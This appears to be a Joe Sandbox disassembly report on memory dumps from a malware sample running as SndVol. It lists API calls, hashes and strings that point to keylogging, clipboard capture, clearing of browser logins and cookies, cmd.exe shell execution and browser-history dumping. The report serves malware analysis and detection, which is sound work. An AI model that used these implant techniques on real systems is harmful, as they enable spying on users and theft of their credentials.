                                                                        • String ID: bad locale name
                                                                        • API String ID: 3628047217-1405518554
                                                                        • Opcode ID: 3e503777330b9a85ac08f860632081d76e90b5ff23de169c4bbc787211530557
                                                                        • Instruction ID: a2ad7606074f4512a4201fc2d443f7434ff60ff76eeaf01c6e5ae9e721c3e157
                                                                        • Opcode Fuzzy Hash: 3e503777330b9a85ac08f860632081d76e90b5ff23de169c4bbc787211530557
                                                                        • Instruction Fuzzy Hash: 53F08131500608BAD368EB62DCA19DB7BF49F30258F90D569A51606198EF30AB0AC688
                                                                        APIs
                                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 2914616B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID: /C $cmd.exe$open
                                                                        • API String ID: 587946157-3896048727
                                                                        • Opcode ID: 9bef302f6f082c714f2d0c8dd26af7deb5ae180dd7200e6f93b19850dc06721c
                                                                        • Instruction ID: 7959e428e3c389ff54d334b408ee3e29417c108ee3df5d1de86f4f041276e869
                                                                        • Opcode Fuzzy Hash: 9bef302f6f082c714f2d0c8dd26af7deb5ae180dd7200e6f93b19850dc06721c
                                                                        • Instruction Fuzzy Hash: 53E03070208344BBE348DAB2CCD4C6F72BC6B7024CB80AC1C704692090EF24AB0A8659
                                                                        APIs
                                                                        • TerminateThread.KERNEL32(2913A2B8,00000000,291A52F0,pth_unenc,2913D0F3,291A52D8,291A52F0,?,pth_unenc), ref: 2913B8F6
                                                                        • UnhookWindowsHookEx.USER32(291A50F0), ref: 2913B902
                                                                        • TerminateThread.KERNEL32(2913A2A2,00000000,?,pth_unenc), ref: 2913B910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: TerminateThread$HookUnhookWindows
                                                                        • String ID: pth_unenc
                                                                        • API String ID: 3123878439-4028850238
                                                                        • Opcode ID: f6fddf783daa7c027a422ef5eb7550c7139dc74e0b06635128a75093b5f76b25
                                                                        • Instruction ID: 6f99d1011257961c524371efff5fba590960b149c0f6b56f7c129b813d496fe4
                                                                        • Opcode Fuzzy Hash: f6fddf783daa7c027a422ef5eb7550c7139dc74e0b06635128a75093b5f76b25
                                                                        • Instruction Fuzzy Hash: 66E08C71204259AFE7282FA298C88657BBAFA01289380052CE6C241128C6354D40D794
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 29131414
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 2913141B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: GetCursorInfo$User32.dll
                                                                        • API String ID: 1646373207-2714051624
                                                                        • Opcode ID: 147916aa3618f15df4e882983f198ee075ccab0777fd58c2b32eddbbe39409df
                                                                        • Instruction ID: 36ac76d8a90b9268d49eceb49373a05adc41867ce4a82e15ac21640610af1970
                                                                        • Opcode Fuzzy Hash: 147916aa3618f15df4e882983f198ee075ccab0777fd58c2b32eddbbe39409df
                                                                        • Instruction Fuzzy Hash: 83B092B06212C8EBFF043BF3EA4C80D3A37B61430A3C10058F04AE110CCB388501EA60
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 291314B9
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 291314C0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetLastInputInfo$User32.dll
                                                                        • API String ID: 2574300362-1519888992
                                                                        • Opcode ID: 50f3a7b635ec1fb8ea3686e442344e972a28bf4a3ee4894a21fd55734375526d
                                                                        • Instruction ID: 252e4f6b4280532e0458d499086a4754dd08bd3a005edaa01ba411599b159260
                                                                        • Opcode Fuzzy Hash: 50f3a7b635ec1fb8ea3686e442344e972a28bf4a3ee4894a21fd55734375526d
                                                                        • Instruction Fuzzy Hash: 06B092B06602C8DBEB043BE7E94C80D3A7AB62531B3810089F446C214DCB388501EF11
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                                        • Instruction ID: acde39e991d7e7e31e040607f04e0d6845bde8cd9fb23b75a0167de8ceb38703
                                                                        • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                                        • Instruction Fuzzy Hash: DFC14971A00205AFEF249F799D40AAABBA8EF47314F1441AFD847B7352E770B941CB52
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm$_strrchr
                                                                        • String ID:
                                                                        • API String ID: 1036877536-0
                                                                        • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                        • Instruction ID: 7c605804ae3b9de22793fdc5282c7a44772a635054f7ab1700271bf399d1e4be
                                                                        • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                        • Instruction Fuzzy Hash: 93A11272E043879FE7158F1ACC91BEABBB1EF11358F1441A9E5959B2C1C7398B42C750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __alldvrm$_strrchr
                                                                        • String ID:
                                                                        • API String ID: 1036877536-0
                                                                        • Opcode ID: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                        • Instruction ID: ac2a3dd53fc38945ef84c58b092c22fe1ab974daed0b8910d2c55bcdcf8c699e
                                                                        • Opcode Fuzzy Hash: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                        • Instruction Fuzzy Hash: 76A16771A007869FEF25CE18C8817AEBFE1EF52300F14416FD596AB381D234B942C752
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID:
                                                                        • API String ID: 269201875-0
                                                                        • Opcode ID: e7a60b7917079c3dcadebd79adb76f0ea77f09f32186847e686c21fe58496bac
                                                                        • Instruction ID: 99d8f33ec80836703f10efd76841e1251ffd015e5d748f041a6abf9e7b0e1daf
                                                                        • Opcode Fuzzy Hash: e7a60b7917079c3dcadebd79adb76f0ea77f09f32186847e686c21fe58496bac
                                                                        • Instruction Fuzzy Hash: 88415432E00301BAFB145B7B9C45ADE3AB9FF513F8F009315F52896290DB3487036AA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4ac14e72ea5fc10fbe6282091c168931b219d9cf26955cdfbb2c3b885da7ccab
                                                                        • Instruction ID: 5d3570a4b4cf64f55a2a946526cb28b0b64719152ab0641ed93bbe8710b86bc0
                                                                        • Opcode Fuzzy Hash: 4ac14e72ea5fc10fbe6282091c168931b219d9cf26955cdfbb2c3b885da7ccab
                                                                        • Instruction Fuzzy Hash: 8A41D671A00705BFE3188F69CC40BDA7BF9EF88718F109A6AE155DB680D77297438790
                                                                        APIs
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,291A4F50), ref: 29134DB3
                                                                        • CreateThread.KERNEL32(00000000,00000000,?,291A4EF8,00000000,00000000), ref: 29134DC7
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 29134DD2
                                                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 29134DDB
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3360349984-0
                                                                        • Opcode ID: be04fd7e56706e8f7c8863c99e443ba1c22f1a037d4332780a9ccb474982a9df
                                                                        • Instruction ID: b812d39746ca690cb62dcf3bc74e515384098a18e3ef399a73f4207db2e2137c
                                                                        • Opcode Fuzzy Hash: be04fd7e56706e8f7c8863c99e443ba1c22f1a037d4332780a9ccb474982a9df
                                                                        • Instruction Fuzzy Hash: DC41E371608344BFD744EB62CC54DAFB7FDAFA4318F80891DF496821D0DB24AB0A8666
Strings
• Cleared browsers logins and cookies., xrefs: 2913C130
• [Cleared browsers logins and cookies.], xrefs: 2913C11F
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 2914C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 2914C5F2
  • Part of subcall function 2914C5E2: GetWindowTextLengthW.USER32(00000000), ref: 2914C5FB
  • Part of subcall function 2914C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 2914C625
• Sleep.KERNEL32(000001F4), ref: 2913A5AE
• Sleep.KERNEL32(00000064), ref: 2913A638
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,2913A788), ref: 2913A6E6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,2913A788), ref: 2913A6F5
• Sleep.KERNEL32(00002710,?,?,?,2913A788), ref: 2913A722
• CloseHandle.KERNEL32(00000000,?,?,?,2913A788), ref: 2913A729
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• API String ID: 1958988193-0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue), ref: 29178618
• GetLastError.KERNEL32(?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue,2918F170,2918F178,00000000,00000364,?,29178367), ref: 29178624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2917858D,00000000,00000000,00000000,00000000,?,291788B9,00000006,FlsSetValue,2918F170,2918F178,00000000), ref: 29178632
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 2914C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 2914C568
• CloseHandle.KERNEL32(00000000), ref: 2914C576
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 291698FA
  • Part of subcall function 29169F32: ___AdjustPointer.LIBCMT ref: 29169F7C
• _UnwindNestedFrames.LIBCMT ref: 29169911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 29169923
• CallCatchBlock.LIBVCRUNTIME ref: 29169947
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• API String ID: 2633735394-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 2914C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 2914C299
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 2914C2C4
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 2914C2CC
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: CloseHandleOpenProcess
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0445A617
  • Part of subcall function 0445AC4F: ___AdjustPointer.LIBCMT ref: 0445AC99
• _UnwindNestedFrames.LIBCMT ref: 0445A62E
• ___FrameUnwindToState.LIBVCRUNTIME ref: 0445A640
• CallCatchBlock.LIBVCRUNTIME ref: 0445A664
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 2914942B
• GetSystemMetrics.USER32(0000004D), ref: 29149431
• GetSystemMetrics.USER32(0000004E), ref: 29149437
• GetSystemMetrics.USER32(0000004F), ref: 2914943D
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 29168FB1
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 29168FB6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 29168FBB
  • Part of subcall function 2916A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 2916A4CB
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 29168FD0
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• API String ID: 1761009282-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04459CCE
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04459CD3
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04459CD8
  • Part of subcall function 0445B1D7: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0445B1E8
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04459CED
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• API String ID: 1761009282-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 29172D3D
Memory Dump Source
• Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
Memory Dump Source
• Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
Similarity
• API ID: __fassign
• String ID: PkGNG
• API String ID: 3965848254-263838557
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _memcmp_wcslen
                                                                        • String ID: ?
                                                                        • API String ID: 1846113162-1684325040
                                                                        • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                        • Instruction ID: ef99701b99918069d3b42d1641c360622645a651551b43329d0dda391b488c7a
                                                                        • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                                        • Instruction Fuzzy Hash: D2419872508315EBDB20EF70DC8899BB7ECEB48B56F00082BF545D21A1E770D944C796
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 29134066
                                                                          • Part of subcall function 2914BA09: GetCurrentProcessId.KERNEL32(00000000,76F93530,00000000,?,?,?,?,29196478,2913D248,.vbs,?,?,?,?,?,291A52F0), ref: 2914BA30
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(291340F5,?,?,291340F5,29195E84), ref: 291485B9
                                                                          • Part of subcall function 291485A3: CloseHandle.KERNEL32(29195E84,?,?,291340F5,29195E84), ref: 291485C2
                                                                          • Part of subcall function 2914C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,2913A87E), ref: 2914C52F
                                                                        • Sleep.KERNEL32(000000FA,29195E84), ref: 29134138
                                                                        Strings
                                                                        • /sort "Visit Time" /stext ", xrefs: 291340B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                        • String ID: /sort "Visit Time" /stext "
                                                                        • API String ID: 368326130-1573945896
                                                                        • Opcode ID: 94e9d53e71ed688b6b5716c9dcdea12c73c2371c737d55d340a32199f12a8bcf
                                                                        • Instruction ID: 2d70dd873de623265aaa8c5c063f64e7aef3cae85bb33d4d02ef225b9f06436d
                                                                        • Opcode Fuzzy Hash: 94e9d53e71ed688b6b5716c9dcdea12c73c2371c737d55d340a32199f12a8bcf
                                                                        • Instruction Fuzzy Hash: C6319531A101187BDB58E7B7DC959EDB779AFA0208F809059D50AA71D0EF206F4FCA94
                                                                        APIs
                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,29181E12,?,00000050,?,?,?,?,?), ref: 29181C92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 0-711371036
                                                                        • Opcode ID: 883fed9478ecba482d0269ca059c7cbed381970bc5bf02c865a89724fbcc5cd6
                                                                        • Instruction ID: 72a4a0bd93e7b3b82756e5d5afbf3c9e92d30b63374d7a6c69b02f3bc0d136c2
                                                                        • Opcode Fuzzy Hash: 883fed9478ecba482d0269ca059c7cbed381970bc5bf02c865a89724fbcc5cd6
                                                                        • Instruction Fuzzy Hash: 5721B563E0020466F3188A57C9CABD77366BF54B5DF428455D919D7104E732DB43DB50
                                                                        APIs
                                                                          • Part of subcall function 29164801: __onexit.LIBCMT ref: 29164807
                                                                        • __Init_thread_footer.LIBCMT ref: 2913B7D2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Init_thread_footer__onexit
                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                        • API String ID: 1881088180-3686566968
                                                                        • Opcode ID: 7657fcb1e0baf5160cf534cd9c8645a3709b09380def265843db4d966c3cfb44
                                                                        • Instruction ID: c3003a58f9b9d58f0cdc2d6a3ad393492a412e828aebb9b7fd84050fe718584e
                                                                        • Opcode Fuzzy Hash: 7657fcb1e0baf5160cf534cd9c8645a3709b09380def265843db4d966c3cfb44
                                                                        • Instruction Fuzzy Hash: 1021C331910108AADB48FBB7DC919FDB779AF60158F909029D00667194FF306F4BCA98
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 0443704D
                                                                          • Part of subcall function 0442AB3C: _wcslen.LIBCMT ref: 0442AB55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _wcslen
                                                                        • String ID: !D@$PG
                                                                        • API String ID: 176396367-1987221222
                                                                        • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                                        • Instruction ID: 3d4cb0eda9c498db01393b725b557ecc4922dd5edf8feeebcd42e299d9ab2e6f
                                                                        • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                                                        • Instruction Fuzzy Hash: AE110521B4421117FF197F3399606BE2686FF94319FC0846FE58A8F2D2EDD47C415255
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, Offset: 04420000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4420000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: o~E$NG
                                                                        • API String ID: 3519838083-4065726910
                                                                        • Opcode ID: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                        • Instruction ID: dfa1472083a6622b4a3b48fb5574b34121d2f08cff703f49eb6fec06c5a9c0e2
                                                                        • Opcode Fuzzy Hash: 17fac1a1b046f946083fd2703b2f90ccc9ed52190986acb3cb5baead9464e690
                                                                        • Instruction Fuzzy Hash: B821E232D000189BEF14FBA6EA41AFEB775FF54314F60416FA526A3191EF742E068B84
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?,291A5598,?,00000000,?,?,?,?,?,?,29145D04,?,00000001,0000004C,00000000), ref: 29135030
                                                                          • Part of subcall function 2914B580: GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        • GetLocalTime.KERNEL32(?,291A5598,?,00000000,?,?,?,?,?,?,29145D04,?,00000001,0000004C,00000000), ref: 29135087
                                                                        Strings
                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 2913501F
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                        • API String ID: 481472006-1507639952
                                                                        • Opcode ID: a74244e252d947c2421704914507534953a508ba4cce2591d536e556fe823d14
                                                                        • Instruction ID: cda50d4b2436f9fc7183c6b59af17ea09de7156e2eccb18c0ab2007a98f19eca
                                                                        • Opcode Fuzzy Hash: a74244e252d947c2421704914507534953a508ba4cce2591d536e556fe823d14
                                                                        • Instruction Fuzzy Hash: 0C214661E043C47FE704B733D8487AE7BB9AB6220CFC0551CD4490715ADA3A5B4AC7E6
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(00000000), ref: 2914B59A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, Offset: 29130000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_29130000_SndVol.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                                        • API String ID: 481472006-2430845779
                                                                        • Opcode ID: ab85591ef15120167ddf0fe3f73f40d22ceea42dfdf0c4b8fc6ffca387b07543
                                                                        • Instruction ID: c8081d60a90ac12fc5c425cd6ed58e178009a38e188e94ac5c4d2b21095120b1
                                                                        • Opcode Fuzzy Hash: ab85591ef15120167ddf0fe3f73f40d22ceea42dfdf0c4b8fc6ffca387b07543
                                                                        • Instruction Fuzzy Hash: BA1151715182446AD344EB63DC508FEB7FCAF64208FD0591DF499821E4EF38EB4AC65A
                                                                        APIs
                                                                          • Part of subcall function 2913B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 2913B1AD
